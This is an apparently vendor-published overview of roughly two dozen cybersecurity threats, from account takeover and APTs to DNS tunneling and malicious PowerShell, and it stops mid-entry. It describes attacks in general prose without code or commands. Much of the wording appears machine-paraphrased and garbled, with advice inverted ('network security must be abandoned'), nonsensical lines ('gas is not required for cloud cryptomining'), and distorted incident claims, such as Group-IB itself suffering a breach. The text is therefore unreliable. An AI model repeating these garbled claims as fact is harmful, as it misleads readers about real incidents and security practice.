Top 50 Cybersecurity Threats

Cybersecurity is more vital than ever, but many organizations face challenges like evolving threats, complex cloud environments, and manual processes. The key to overcoming these is a data-driven approach, powered by machine learning and automation. By focusing on data, businesses can detect threats faster, automate responses, and strengthen their security posture.

At SupportMax, we provide the tools and expertise to help organizations build resilient defenses, ensuring they stay ahead of cyber risks and drive growth with confidence.

Account Takeover

One of the riskier methods of gaining access to a user’s account is account takeover. Usually, the attacker assumes the identity of a real user, customer, or employee in order to finally access the accounts of the person they are impersonating.
84% of firms experienced identity-related breaches in 2022 alone, and 96% of them stated that identity-centric security could have prevented or reduced the breach.
Finding unusual user activity can be very difficult if the wrong tools and regulations aren’t in place (such vendor management and zero trust). since of this, these attacks frequently go unnoticed since, depending on how extensive the identity and access management (IAM) architecture in place is, or even if it exists at all, the authentication carried out by a bad actor may appear to be that of a valid user.

What you should know is that account takeover is more covert than blatant card or credential theft, enabling the attacker to utilize the stolen card as much as possible before raising red flags for questionable activity. Any website that requires a login is vulnerable to this assault, and frequent targets include banks, well-known marketplaces, and financial institutions like PayPal.
Network security must be abandoned by organizations if they want to improve user identity protection and authentication. Until recently, an organization’s capacity to centrally monitor the total security of its resources was limited by the fact that certain technologies just lacked the requisite integration skills. These days, access control is at the center of a plethora of technologies, such as multifactor authentication (MFA). No user or device, whether inside or external to the company, should be implicitly trusted in order to prevent illicit authentication on cloud apps. Instead, access to all resources should be explicitly and continually authenticated and approved.

How the attack is carried out: Brute force botnet attacks, phishing, malware, and proxy-based “checker” one-click apps are some of the most popular techniques. Other techniques include buying lists of “Fullz,” a name for complete packages of identifying information sold on the underground market, and dumpster diving to obtain personal information in trashed mail.
After purchasing or creating the victim’s profile, an identity thief can utilize the data to get around a knowledge-based verification system.
When a company still relies on network/endpoint security, or when there is a clear lack of or inadequate IAM framework, the threat or attacker can also simply access the network or breach the perimeter. Due to the low identity access constraints in both cases, the attacker has complete control over their account and can log in using the stolen credentials without being noticed.

Where the attack originates: We conduct a huge number of our transactions, both financial and non-financial, online. Obtaining account passwords and personal data (such as phone numbers, home addresses, credit card numbers, and other financial information) is a lucrative endeavor for cybercriminals, regardless of whether they decide to sell the data or utilize it for their own benefit. Due to the rising frequency of phishing assaults, the proliferation of user identities, and the ongoing expansion of cloud use, attackers can originate from any source, including contractors, employees, independent contractors, and third-party vendors.

Advanced Persistent Threat

An advanced persistent threat (APT) from China compromised 25 Microsoft Exchange accounts belonging to different U.S. agencies in one noteworthy incident. As per reports, the APT group was able to gain unauthorized access to various Azure Active Directory applications, including those that support personal account authentication like Teams, OneDrive, SharePoint, and customers’ applications that enable the ‘login with Microsoft’ functionality, as well as multitenant applications under specific circumstances.

What is essential to know:
A very sophisticated, covert danger against a computer system or network that an unauthorized user manages to breach, evade detection, and collect information for commercial or political purposes is known as an advanced persistent threat, or APT. Financial gain or political espionage is the primary goal, usually carried out by criminals or nation-states. APTs are still linked to nation-state actors who want to steal trade secrets or government secrets, but anonymous cybercriminals can also utilize APTs to steal intellectual property or data.

How the attack is carried out: An advanced persistent threat (APT) typically uses a combination of very sophisticated tactics, such as some intelligence gathering, and less sophisticated ways to gain access to the system, such as spear phishing and malware. Target compromise and access maintenance are accomplished using a variety of techniques.

The most popular attack strategy involves reading an authentication database, figuring out which accounts have the right rights, and then using those accounts to compromise resources in order to spread from a single machine to a whole network. In the exploited environment, APT hackers would also install backdoor programs (such as Trojan horses) on hacked machines. They take this action to ensure that they can re-enter even in the event that their credentials are later changed.

Where the attack originates: The majority of APT organizations work as agents or are connected to the governments of independent states. An APT may also be a full-time, professional hacker employed by the aforementioned companies. These state-sponsored hacking groups typically possess the means and expertise to thoroughly investigate their target and identify the ideal port of entry.

Amazon Web Services (AWS) Attacks

With the growth of cloud computing, the quantity of innovative assaults on virtual environments has skyrocketed. Furthermore, Amazon Web Services, one of the biggest providers of cloud services, has seen its fair share of challenges.
The security of cloud providers is at risk from a number of problems. For instance, when a digital marketing company went out of business, its Amazon S3 bucket was not password protected. Thirty-six thousand people’s data were compromised.
The complete breach included 50,000 files including 32GB of complete names, addresses, phone numbers, email addresses, and hashed passwords .

What you should know: According to Amazon’s “shared responsibility” approach, the client is in charge of the security within the S3 container, while AWS is in charge of the environment outside the virtual machine.
This indicates that as businesses have quickly embraced cloud technology, threats that exploit vulnerabilities caused by misconfigurations and deployment problems have grown more prevalent, and the company utilizing AWS is in charge of maintaining the security of their environment.
The issue is that AWS users now have to be concerned about extra dangers.

How the attack occurs: There are several methods in which an attack on an AWS instance can take place. It’s crucial to maintain vigilance for even seemingly innocuous actions within an AWS environment. Actions to watch out for include S3 access from strange places and from unknown individuals.
Controlling and keeping an eye on who has access to an organization’s AWS infrastructure is also crucial.
Investigative efforts can be effectively launched by identifying questionable logins to AWS infrastructure.
Deeds that result in direct financial expenses include aggressive actions brought on by compromised credentials since customers are charged for any EC2 instances that the attacker creates.

Where the attack originates: Due to the variety of services hosted on AWS and the continual emergence of new cloud threat types, these attacks can essentially originate from anywhere.

Application Access Token

An active and unidentified threat actor used several tactics to obtain and exploit information from important targets. One technique involved abusing Open Authentication (OAuth) tokens to gain access to well-known companies’ repositories, such as the production infrastructure of Github npm and apps coupled with cloud offerings like Travis-CI and Heroku.

What you should know is that an attacker can utilize the user-granted REST API to carry out tasks like contact enumeration and email searches by obtaining an OAuth access token.
If a malicious program obtains an OAuth access token from a cloud-based email provider and is then issued a “refresh” token that allows background access, it may be able to access user account features permanently.

How the attack is carried out: By using application access tokens, attackers can get beyond the standard authentication procedure and gain access to password-protected accounts, data, or services on distant systems. Usually taken from users, these tokens are used in place of login credentials.

Where the attack originates:
One way to compromise other services is through compromised access tokens. If a token, for instance, allows access to the victim’s primary email, the attacker could be able to use forgotten password procedures to gain access to all other services the target is subscribed to. Using a token for direct API access renders a second authentication factor ineffective and may be resistant to countermeasures like password changes.

Bill Fraud

Paypal is an online payment system and financial service that makes it simple for users to send and receive money. However, the same qualities that make Paypal so effective and rapid to send money are also used by cybercriminals to steal money. Through payment fraud methods, hackers and con artists take advantage of the system to steal money from customers, sometimes even wiping out entire bank accounts.

What is essential to know:
Any fraudulent or unauthorized transaction in which a cybercriminal takes money away from customers is referred to as bill fraud, also known as payment fraud. These tactics are effective; in 2022, consumers reported losing around $8.8 billion due to fraud, up more than 30% from the year before, according to current FTC data.

How the attack operates: To keep a large number of users from realizing the fraud, this assault continuously fools them into paying little or reasonable amounts of money. In this scam, hackers issue fake bills that appear real and encourage victims to transfer money out of their accounts.
The attackers capitalize on the possibility that their targets will mistakenly believe the bogus bill is for a service they genuinely use, since they are aware that the majority of clients frequently utilize fee-based digital services.
After that, customers will start a credit card payment or cash transfer to cover the cost of the fraudulent “bill.”

Where the attack originates:
Organizations engaged in bill fraud have their roots everywhere, including the US. Usually, it is outsourced to hackers who have the means, time, and equipment to produce phony invoices that appear authentic. Similar to phishing, bill fraud typically targets a large, haphazard group of people.

Brute Force Attack

Brute force attacks can occur on any kind of service; Windows Remote Desktop Protocol (RDP) is one current example. Due to a high number of exposed endpoints, Microsoft has seen a notable increase in RDP brute force assaults from early 2020 to the present. This enables threat actors to successfully exploit weak or widely used credentials to obtain unauthorized access to a variety of systems.

What is essential to know:
Using a trial-and-error method, a brute force assault seeks to get personal information, particularly usernames and passwords. One of the easiest methods to get into a password-protected account, server, or program is to test different usernames and password combinations until the attacker finds one that works—there are billions of possible possibilities for a six-character password—and if they do, that is.

How the attack takes place:
A dictionary attack is the most fundamental type of brute force assault, in which the attacker methodically searches through a dictionary or wordlist, trying each entry one by one until they hit. They may even utilize customized dictionaries that contain leaked or frequently used passwords, or they may supplement words with symbols and numbers. Additionally, automated tools for running dictionary attacks can make this work much quicker and less tedious if they lack the necessary time or patience.

The source of the attack is that hackers and cybercriminals with little to no technical skills can attempt to access someone’s account because of the simplicity and convenience of use of a brute force attack. The individuals spearheading these efforts possess sufficient time or computational capacity to ensure their success.

Business Email Compromise

Like business invoice fraud, business email compromise (BEC) has changed over time, particularly with the increase in video calls following COVID-19. Using fake meeting invitations, shady characters who pose as reliable business contacts often carry out the attack. As per a study, there has been a surge in BEC complaints to the FBI IC3, alleging that victims are being instructed to transfer funds to bogus accounts through virtual meeting platforms.

What is essential to know:
Business email breach tries to fool victims into paying money for a phony bill that seems real and is sent to their company. Actually, the money goes to con artists posing as vendors, associates, or business associates. Attackers might entice high-profile targets with intricate and convincing phishing scams, or they can target institutions in developing areas with weak cybersecurity infrastructure or operational controls. These tactics frequently go beyond simple fraud. The only goal these cybercrime syndicates have is money. and in large quantities.

How the attack happens: In one scenario, hackers get around local security mechanisms by using highly skilled malware. They then use a messaging network they have access to to send fake messages that start cash transfers from larger banks’ accounts. In a different assault scenario, the bad guys persuade stakeholders to move substantial amounts of money to their bank accounts by launching targeted spear phishing attacks. In an effort to steal money, victims receive fictitious invoices in the hopes that their targets will overlook their accounts payable procedures.
Hackers will select targets according to the size of the company, the location, and the suppliers they employ, then produce fake invoices that seem authentic.
They send fictitious invoices with demanding terms like “90 days past due, pay now!” in the hopes that the victim’s accounts payable staff is overworked.

Origin of the attack: Although there are many lone con artists committing business invoice fraud, many are linked to fraud rings that possess the structure and means to investigate their target’s financial institution and fabricate an authentic-looking invoice. There are fraud gangs operating invoice frauds everywhere in the world.
Wire attack perpetrators in the past have included highly organized international and nation-state cybercrime outfits like APT 38 and Lazarus Group.
These groups possess the tools and resources needed to execute intricate and multifaceted attacks. Although the identity of the specific leader of these gangs is unknown, some reports have suggested that they may be connected to North Korea.
However, sophisticated wire transfer attacks have also been linked to cyber gangs in China and Nigeria. A word of caution: insiders are probably used in high-value wire attacks at organizations with stronger security measures.

Cloud Cryptomining

Gas is not required for cloud cryptomining to operate. For proof, look no farther than Github. Threat actors conducted a wide-ranging freejacking operation, encompassing 30 GitHub accounts, 2,000 Heroku accounts, 900 Buddy accounts, and 130 Docker Hub images. This allowed them to abuse a large number of free accounts with as little human effort as possible, leading to the cloud-based software code repository becoming the target of a cloud cryptomining attack.

What is essential to know:
Cryptomining is a resource-intensive, purposefully challenging industry. Its intricacy was intended to guarantee a constant daily mining output of blocks. Thus, it’s common knowledge that ambitious but dishonest miners prioritize cryptojacking, the technique of amassing the processing power of big businesses.

How the attack takes place:
The media’s focus on cryptocurrency mining has grown since the practice’s meteoric rise to prominence in the fall of 2017. From mobile devices and in-browser flaws, the attacks have shifted to enterprise cloud services like Microsoft Azure, Google Cloud Platform (GCP), and Amazon Web Services.
Since hackers are always improving the ways in which they can avoid detection—such as by using unlisted endpoints, controlling their CPU consumption, or disguising the IP address of the mining pool behind a free content delivery network (CDN)—it is challenging to pinpoint the precise extent of the practice.
The expenses to the account holder can skyrocket when miners hijack a cloud instance, frequently creating hundreds of new instances. Thus, it’s imperative to keep an eye out for any unusual activity on systems that might point to a network compromise.

Where the attack originates: Since cryptocurrencies are a worldwide good, they might come from anyone. Monitoring cloud computing instances for activities related to cryptojacking and cryptomining—such as newly created instances from previously undiscovered regions, users launching unusually large numbers of instances, or compute instances started by previously unseen users—is crucial rather than concentrating on the origins of the attacks.

Command and Control Attack

Cybersecurity experts utilize the commercial penetration testing program Cobalt Strike to model sophisticated threat behaviors and evaluate the security posture of a business. With its “Beacon” payload, it is most notable for its breadth of capabilities, which include post-exploitation, exploitation, and reconnaissance.
This payload has made it possible to command and control (C2) compromised hosts in recent years, allowing for covert communication, lateral movement, and a variety of in-memory attack strategies. Cobalt Strike is a genuine tool for threat emulation and red team operations, however because of its strong features and ability to evade detection, malicious actors have also exploited hacked versions of this software in cyberattacks.

What is essential to know:
When a hacker gains control of a computer, they are carrying out a command and control attack, which involves sending malware or commands to other systems on the network. Sometimes, the attacker moves laterally across the network to obtain sensitive data by conducting reconnaissance operations. The prevalence of these attacks is still rising, as seen by the startling 30% increase of command-and-control servers (C2) in 2022 alone.
Hackers may utilize this infrastructure to launch real attacks in other attacks. Among the infrastructure’s most crucial roles is the establishment of servers for communication with implants on vulnerable endpoints. These assaults are also frequently called C&C or C2 attacks.

How the attack is carried out: The majority of hackers use phishing emails to enter a system and then install malware. By doing this, a command and control channel is created that serves as a data proxy between the attacker and the compromised endpoint. These channels provide commands to the vulnerable endpoint and the attacker receives the output of those commands.

Where the attack originates: Russia, Iran, and even the United States have all been the target of well-known command and control attacks. They don’t want you to know that these attackers can appear anywhere and at any time.
Because communication is so important, hackers employ strategies meant to conceal the actual content of their messages. They often use a range of strategies to communicate over various channels while keeping a low profile, trying to track their activities for as long as possible without being discovered.

Compromised Credentials

In 2023, Group-IB, a leader in worldwide cybersecurity, experienced a significant data breach. Tens of thousands of accounts with saved chat GPT credentials were compromised by the coordinated attack. It should come as no surprise that cybercrime syndicates have become very fond of the large language model-based chatbot, especially when it comes to breaking into accounts and exposing private data for campaigns against businesses and their employees.

What you should know: The majority of users still authenticate themselves using single-factor authentication, which is generally frowned upon in the cybersecurity community. Even with the introduction of more stringent password regulations (such as character count, mix of digits and symbols, and intervals for renewal), end users continue to reuse their login information across platforms, apps, and accounts without changing it on a regular basis.
Adversaries can more easily access a user’s account with this kind of approach, and many of the breaches that occur today are the result of these credential harvesting activities.

How the attack takes place:
A threat actor may utilize a password, key, or other identified information to access data and resources without authorization. This might happen to a single account or to a whole database.
Through the use of a reliable account within the intended target organization, a threat actor can remain hidden and steal confidential information without causing suspicion. Phishing schemes, malware assaults, and password sniffers are common techniques for credential harvesting.

Where the attack originates:
A significant attack vector is compromised credentials, which provide relatively easy access for threat actors to computing devices, password-protected accounts, and an organization’s network infrastructure. These criminals are frequently well-organized and have a target or targets in mind.
Furthermore, they might not always be external to the corporation; they could be internal threats with some degree of authorized access to its databases and systems.

Credential Dumping

Recently, Trigona, a new ransomware strain, was discovered. It employs distinct techniques to target Windows, specifically using the Mimikatz tool to extract sensitive data from Windows, including the registry, Windows memory, and the Local Security Authority Subsystem Service (LSASS) process. After that, Mimikatz extracts and dumps all of the credentials—which include hashes, Kerberos tickets, and users and passwords—into a file.

What you should know: An attack that depends on obtaining credentials from a targeted system is known as “credential dumping.” An attacker can still retrieve the data and crack it offline on their own systems, even though the credentials are frequently hashed or encrypted. For this reason, the attack is called “dumping.”
Hackers frequently attempt to take credentials from systems they have already gained access to. When individuals use the same password for many accounts on other platforms, the issue is exacerbated.

How the attack is carried out: The credentials that are obtained in this manner are typically those of privileged users, which may grant access to more private data and system functions.
A multitude of sources, such as accounts like the security accounts manager (SAM), local security authority (LSA), NTDS from domain controllers, or the group policy preference (GPP) files, are frequently targeted by hackers in an attempt to obtain the credentials.
After gaining legitimate credentials, attackers can easily navigate a target network, finding new systems and assets of interest.

Where the attack is coming from: Anywhere can be the source of credential dumping.
Furthermore, as we are all guilty of reused passwords, that data may be sold for use in other attacks.

Credential Reuse Attack

The 2022 Paypal breach, which unfortunately for the online payment system affected over 30,000 accounts in the course of a few months, is one prominent example of a credential reuse assault. According to an email sent out by Paypal following the incident, threat actors obtained access to personal data, including their “name, address, Social Security number, individual tax identification number, and/or date of birth.”

What you should know: Reusing credentials is a widespread problem in every organization or user base. These days, the majority of users have tens, if not hundreds, of accounts, and they have a lot of passwords to remember that need to fulfill a variety of complicated specifications. Consequently, individuals will turn to repeatedly using the same password in an attempt to improve account management and memory.
Not surprisingly, if those credentials are compromised, this can lead to serious security problems.

How the attack takes place:
The assault itself is theoretically easy to execute, uncomplicated, and relatively covert (if two-factor authentication isn’t turned on). The “reuse” in “credential reuse attack” comes from the fact that the hacker can attempt using the same login and password on different banking or consumer websites until they find a match after obtaining the user’s credentials.
But getting admitted in the first place is a little trickier. Attackers typically start with a phishing attempt in order to obtain privileged information. They do this by exploiting websites and emails that appear authentic to trick the victim into providing their credentials.

The source of the attack could be someone who knows the victim and wants access to their accounts for financial, professional, or personal reasons. This could be a targeted attack. Another possibility for the attack’s source could be a total stranger who purchased the user’s personal data on the dark web.

Cross-Site Scripting

Recently, Zimbra, a collaboration software package, was found to have a cross-site scripting (XSS) vulnerability that enables threat actors to collect sensitive user data in a targeted assault.
Malicious scripts can be inserted into trustworthy and otherwise innocuous websites through XSS attacks.
Similar in concept to SQL injection, which involves inserting malicious code into a form to access the website’s database, cross-site scripting (XSS) allows an attacker to take advantage of user cookies, read session IDs, modify website contents, or send users to malicious websites. The malicious code in XSS is intended to run in the browser of a different website visitor.

What you should know: Cross-site scripting (XSS) attacks happen when an attacker sends malicious code—typically in the form of a browser side script—to a separate end user through an online application. Widespread vulnerabilities exist anytime an online application generates user input without encoding or validating it, which makes these attacks possible to execute.
When a script runs automatically, the end user’s browser is unaware that it shouldn’t be trusted. As a result of its perception that the script is reputable, it has access to cookies, session tokens, and other private data stored in the browser. These scripts have the ability to modify the HTML page’s content.

How the attack takes place:
XSS attacks come in two flavors: reflected and stored. A stored cross-site scripting (XSS) attack happens when an injected script is kept on the server in a fixed place, such as a comment or post on a forum. The XSS attack will impact every user that visits the compromised page. The injected script is presented to the user as a response to a request in reflected XSS, such as a search results page.

Where the attack originates:
Even though XSS attacks are less frequent than they once were (mainly because of advancements in browsers and security technology), they are still significant enough to be included in the top ten threats by the Open Web Application Security Project, and almost 14,000 vulnerabilities are linked to XSS attacks in the Common Vulnerabilities and Exposures database.

Cryptojacking Attack

Cybercriminals stole cryptocurrency in July 2023 by surreptitiously mining up to 200 cloud workloads without users’ consent.
The cryptojacking assault began when covert fileless payloads were skillfully loaded into the memory of the target system without being discovered.

What you should know: A hacker using malware that conceals on a device targets and hijacks computer systems in order to mine cryptocurrency, like Bitcoin or Ethereum, at the expense of the victim. This type of attack is known as cryptojacking. The goal of the hacker is to use the computer resources of others to create valuable cryptocurrencies.

How the attack is carried out: One typical method of cryptojacking an email is to include a malicious link that invites recipients to download cryptomining programs straight to their machine. Another method is to carry out a drive-by attack, which involves inserting some JavaScript code into a webpage that the visitor visits. Malicious programs meant to mine cryptocurrencies will instantly download onto the device upon viewing the page. Subsequently, the cryptomining code operates in the background without the user’s awareness; in fact, a slower-than-usual computer may be the sole clue that something is amiss.

Origin of the attack: Since cryptojacking doesn’t require a lot of technical expertise, attacks like these might originate anywhere in the world. On the deep web, cryptojacking kits may be purchased for as low as $30. For hackers looking to generate quick cash at minimal risk, it’s an easy access point.

DNS Amplification

Malicious actors used the international corporate communications provider Mitel to orchestrate large-scale, amplified distributed denial-of-service (DDoS) assaults in February 2022.
Financial institutions, internet ISPs, logistics and gaming enterprises, among other entities, were severely impacted by the attack. With a single malicious network packet, these attacks, which have the potential to last up to 14 hours and have a record-breaking amplification factor of about 4.3 billion to one, can take down a whole organization’s voice communications and other services.

What you should know: Although DNS amplification attacks, a particular kind of DDoS attack, have been around for a while, the methods of exploitation are always changing. In that it exploits the internet’s directory by misconfiguring it, the attack bears similarities to DNS hijacking. However, the attacks happen in a somewhat different method.
Sending a tiny amount of data to a network service that is vulnerable to a DNS amplification attack usually results in the service responding with a significantly greater amount of data. An attacker can exert relatively little effort while forcing other people’s computers perform all the work of flooding a targeted target offline by aiming that response at the victim.

How the attack works: A DNS amplification attack involves flooding a website with fictitious DNS lookup requests until the site crashes due to network bandwidth being used. In contrast to DNS hacking, which can send users to another website, a DNS amplification assault stops the website from loading.
The term “amplification” serves as additional evidence of the distinctions between the two attacks. Hackers use a more involved answer when making DNS requests in this attack. A hacker might ask for more information, for instance, than just the domain name. An “ANY record,” which demands the domain along with the subdomain, mail servers, backup servers, aliases, and more, is another option available to the attacker.
Imagine now that multiple of these “ANY” requests arrive at once. The site must go offline due to the increased traffic.

Where the attack originates: Because of its very simple nature, the attack can originate from any place in the world, be it a nation-state hacker or a lone wolf, much like a DNS hijacking attack.

DNS Hijacking

An attempt at DNS hijacking occurred against Celer Network, a cross-chain bridge and interoperability protocol, towards the end of 2022.
Users were finally led to phishing smart contracts on Avalanche, Ethereum, and Polygon by the hijack of their cBridge user interface, which eventually depleted their account balance.

What is essential to know:
Because DNS is essential to the routing of web traffic, it is sometimes referred to as the internet’s phonebook or its Achilles heel. The protocol that maps domain names to IP addresses is called DNS. It has been demonstrated to perform admirably for the intended purpose. However, DNS is infamously attack-prone, which is partly due to its distributed architecture.
DNS is based on unstructured connections over intrinsically unsafe protocols between millions of clients and servers.
There is no denying the seriousness and significance of protecting DNS from intrusions. A hacked DNS can have terrible consequences. Hackers have the ability to take down a whole company in addition to obtaining login credentials, emails, and private data.

How the attack operates: Hackers take advantage of the way DNS interacts with a web browser to carry out their attack.
When a domain, such as NYTimes.com, is translated into an IP address, the system functions as a phone book.
After determining which global server is hosting that website, the DNS routes traffic to it. When a hacker manages to interfere with a DNS lookup, they can either take down the website or divert visitors to another website under their control.

The origin of the attack is unknown, mainly because a DNS hijacker can carry out an attack with the same ease as a social engineering attack in which a user calls a domain provider and deceives them into altering a DNS record.

DNS Tunneling

Over the past few years, a hacker organization known as OilRig has regularly attacked multiple Middle Eastern governments and companies using a range of tools and techniques. It uses DNS tunneling to keep a connection open between its command-and-control server and the system it is assaulting in order to impede regular operations and steal data.

What is essential to know:
The Domain Name System (DNS) is the mechanism that converts URLs entered into web browsers into their numerical IP addresses; imagine DNS as the internet equivalent of a phone directory. Due to DNS’s lack of design for data transfer, traffic using it is frequently left unmonitored and open to various attacks, such as DNS tunneling, which occurs when an attacker inserts malicious data into a DNS query—a long string of characters that appears before a URL.
DNS tunneling does have a purpose; antivirus software providers, for instance, utilize it to quietly give their clients updated malware profiles. Organizations should carefully monitor their DNS traffic to ensure that only reliable traffic is allowed to pass across the network due to the possibility of legitimate use.

How the attack works: By rerouting traffic to their own server and creating a link to an organization’s network, an attacker can circumvent security measures (tunneling under or around them, as it were). Once the link is established, a variety of assaults, including command and control and data exfiltration, are feasible.

Where the attack originates:
Even while DNS tunneling programs are easily downloadable, more advanced understanding is needed by attackers who want to go beyond simply getting past a hotel or airline’s paywall to access the internet.
DNS is also a highly sluggish data transport technology because it was created primarily to resolve web addresses.

DoS Attack

One of the most well-known denial-of-service (DoS) assaults was carried out by a 16-year-old hacker named Mafiaboy over 20 years ago. It brought down multiple popular websites, including CNN, eBay, Amazon, and Yahoo. Mafiaboy reportedly got into numerous networks to install malware that was intended to overwhelm targets with attack traffic. The attack lasted almost a week as the targeted organizations scrambled to determine out what happened and how to go back online because many sites were ill-prepared for such an attack. After being apprehended, Mafiaboy received a juvenile imprisonment sentence.
Twenty years later, denial-of-service (DoS) attacks, many of which are distributed denial-of-service (DDoS) attacks designed to bring down websites and online services and are orchestrated by hackers, hacktivists, or cyber spies, are becoming more frequent and one of the most common types of attacks that organizations encounter; by 2022, DDoS attacks are expected to grow by 150% globally.

What you should know: Denial-of-service (DoS) attacks occur when hackers render a network or machine unusable for the people who intended to use it. DoS attacks can be carried out by delivering information that causes a system to slow down or crash entirely, or by flooding networks with traffic. Similar to DDoS attacks, DoS attacks typically target well-known companies or those with widely accessible websites, like banks, e-commerce sites, media outlets, or government agencies. DoS attacks cause significant harm to the victim, including loss of revenue, reputation, security and cleaning expenses, and customer attrition. They also prevent genuine customers from accessing the service they desire.

How the attack happens: A targeted network might be flooded or crashed in one of two ways by a denial-of-service attack. Cybercriminals use flood assaults to overload victim computers with traffic, forcing them to slow down or shut down completely. Buffer overflow, ICMP, and SYN flood assaults are a few examples of different flood attacks.
By stopping consumers from accessing a website or network resource, DDoS attackers hope to cause havoc on their targets, ruin web properties, harm brand reputation, and cause financial losses. DDoS makes use of thousands or even hundreds of compromised “bot” computers spread over the globe. These hordes of infected computers, also referred to as “botnets,” will carry out the attack simultaneously for maximum impact.

Where the attack is coming from: Denial of service (DoS) attacks might come from anyplace in the globe. Attackers can carry out malicious activities, take control of victim machines, install malware, and carry out other heinous acts with the assurance that they won’t be discovered by hiding their whereabouts.
DDoS attacks, as their name suggests, are dispersed, which means that a multitude of sources contribute to the incoming deluge of traffic that is directed towards the victim’s network. As a result, the hackers responsible for these attacks could originate from anywhere in the globe. Furthermore, it is impossible to stop these attacks by only protecting or blocking a single source due to their spread nature.

Drive-by Download Attack

When a phony Google Play Protect overlay appeared in January 2020, users of the venerable blog and magazine site Boing Boing were prompted to download a malicious APK that installed a banking Trojan on their Android devices. It showed up as a (fake) Adobe Flash installation page that spread other malicious apps to Windows users. The content management system of Boing Boing had been compromised. JavaScript that was injected into the page automatically started the drive-by downloads, even if the visitor declined the bait. Although Boing Boing was able to identify the attack and take down the script rather quickly, the consequences might have been catastrophic considering the five million unique visitors to the website, including former President Barack Obama.

What is essential to know:
Drive-by downloads are when malicious code accidentally finds its way onto a computer or mobile device, exposing users to various hazards. Drive-by downloads are a common tool used by cybercriminals to infect user devices with malware, install banking Trojans, steal and gather personal information, and more. Regularly update or patch systems with the most recent versions of applications, software, browsers, and operating systems to safeguard against drive-by downloads. Avoiding unreliable or perhaps dangerous websites is also advised.

How the attack takes place:
Drive-by downloads are unique in that users do not have to click on any links in order for the download to begin. A website can be accessed or browsed to initiate the download. Without the user’s awareness, the malicious code is intended to download harmful files onto the victim’s device.
Drive-by downloads exploit old, unsecured, or susceptible browsers, programs, or even operating systems.

Where the attack originates:
These assaults can be carried out by hackers of any experience level because to the proliferation of prepackaged drive-by download kits. In actuality, the hacker doesn’t need to write their own code or set up their own infrastructure in order to buy and exploit these kits for data exfiltration or other abuses.
These assaults can originate almost anywhere due to how simple they are to carry them.

Insider Threat

retaliation. The story is as old as eternity. An IT specialist faced charges in 2022 for allegedly breaking into a Chicago healthcare organization’s server. As a contractor, he had gained access to the server, and this gave him motivation.
After being turned down for a position at the company, he was let go by the contracting IT firm a few months later. This act of personal revenge led to a hack that severely affected numerous patients’ medical examinations, treatments, and diagnoses. If found guilty, the attacker might spend up to ten years in federal prison.

What is essential to know:
A malicious attack carried out by insiders with permission to access your bank’s computer system, network, and resources is known as an insider threat attack. Attackers frequently seek to steal sensitive, proprietary, or confidential data and assets in this kind of attack, either for their own benefit or to provide rival businesses access to the information. They might also attempt to damage your company’s brand, productivity, and revenue by causing system disruptions.

How the attack is carried out:
Malevolent insiders have a clear advantage because they already have access to the assets, data, and network of your firm. They might gain access to vital systems or data through accounts that make it simple for them to find it, get beyond security measures, and send it outside the company.

Where the attack originates:
Inside spies may pose as contractors, outside parties, or remote workers, or they may be ill-intentioned employees of the company. They might operate alone or as a part of rival groups, nation-states, or criminal networks. Even though they may also be far-flung outside contractors or suppliers, they often have some sort of authorized access to the company’s systems and data.

IoT Threats

Following the discovery of a data breach that compromised the private data of more than 3,000 customers of Ring, an Amazon-owned home security company, cybercriminals exploited the breach to take control of smart cameras and video doorbells.
Because of their Ring devices, thousands of companies are still at risk; according to researchers, these confirmed attacks are only the beginning. Since then, Ring has added end-to-end video encryption to help guard against future intrusions, but these kinds of attacks won’t stop because IoT devices are becoming more and more common.

What you should know: By 2030, there will likely be 30 billion linked IoT devices worldwide, up from the current estimate of 15.14 billion. These devices frequently lack security infrastructure, which leaves the network with obvious weaknesses that increase the attack surface and make it more vulnerable to malware. Threats posed by social engineering, ransomware, and DDoS attacks can all be transmitted through IoT devices.

How the attacks is carried out: Hackers and hostile nation-states might employ sophisticated malware to take advantage of security holes in networked IoT devices in order to obtain access to a network and monitor users or steal confidential or personally identifiable information. Hackers can use their newly acquired access to travel laterally across connected devices or to enter a larger network for a variety of malevolent objectives once they have breached an IoT system.

Attack origin: An attack might originate from any location on the planet.
However, because a large number of verticals, including the government, business, and healthcare sectors, are implementing IoT infrastructure without the necessary security safeguards, these systems are vulnerable to assaults from hostile nation-states and highly skilled cybercrime groups. Attacks on linked civic or healthcare systems, as opposed to those against technological infrastructure, have the potential to cause widespread disruption, fear, and even human endangerment.

Macro Viruses

A macro virus was the cause of the Melissa virus, which made headlines in the late 1990s and is considered one of the most notorious virus incidents ever. The user’s Microsoft Outlook email account would be taken over by a Melissa-infected PC, which would then send malicious emails to the first 50 addresses in the user’s mailing lists. The virus spread incredibly quickly and caused great damage all across the world, with cleaning and network repairs alone costing an estimated $80 million. Even if the peak of the macro virus may have passed, these attacks continue, and they’re not limited to Microsoft Windows users anymore—recent attacks have also targeted Mac users.

What you need know is that a computer virus built in the same macro language as software applications is referred to as a macro virus. There is a unique way for harmful computer instructions to proliferate since certain software, such as Microsoft Office, Excel, and PowerPoint, enable macro programs to be inserted in documents so that the macros execute automatically when the page is opened.
For this reason, opening emails with unexpected attachments or from senders you are not familiar with can be risky. Although a lot of antivirus software can identify macro infections, it can still be challenging to identify their activity.

How the attack is carried out: Phishing emails with infected attachments are frequently used to disseminate macro infections. Many receivers open the email because it appears to be from a reliable source. Once a malicious macro has been run, it can spread to all other documents on the user’s PC and infect them. Every time a user accesses or quits a document that has an infection, macro viruses propagate. Rather than operating systems, they are run by apps. Opening an attachment from an email and exchanging data over a network are the most popular ways for macro infections to proliferate.

Where the attack originates:
Despite being less common in malicious attempts, macro viruses still pose a serious threat because antivirus software can now detect and stop them more effectively. A quick Google search for “macro virus” turns up resources that help noncoders create these viruses as well as instructions for making macro viruses. Theoretically, anyone with internet access could easily construct a macro virus.

Malicious Powershell

Top cybercriminals and cyberespionage organizations are generally drawn to attack sequences that take advantage of the widely used PowerShell because they facilitate the spread of viruses throughout a network. PowerShell scripts are used by infamous bad actors like APT29 (also known as Cozy Bear) to obtain vital information that helps them plan even more intricate cyberattacks. The infamous threat group APT35, also known as “Charming Kitten,” exploited Powershell in 2020 to gather and steal data from a local government in the United States and to launch a ransomware assault on a charitable organization.

What you need to know: PowerShell is a Microsoft command-line and scripting tool built on.NET (pronounced “dot net”) that enables users and administrators to automate processes and modify system settings. Because of its versatility and array of tools, the command-line interface (CLI) is a widely used shell and scripting language. The benefits of PowerShell, such as the ability to operate covertly on a system as a code endpoint and carry out operations in the background, have also been noticed by bad actors.

How the attack takes place:
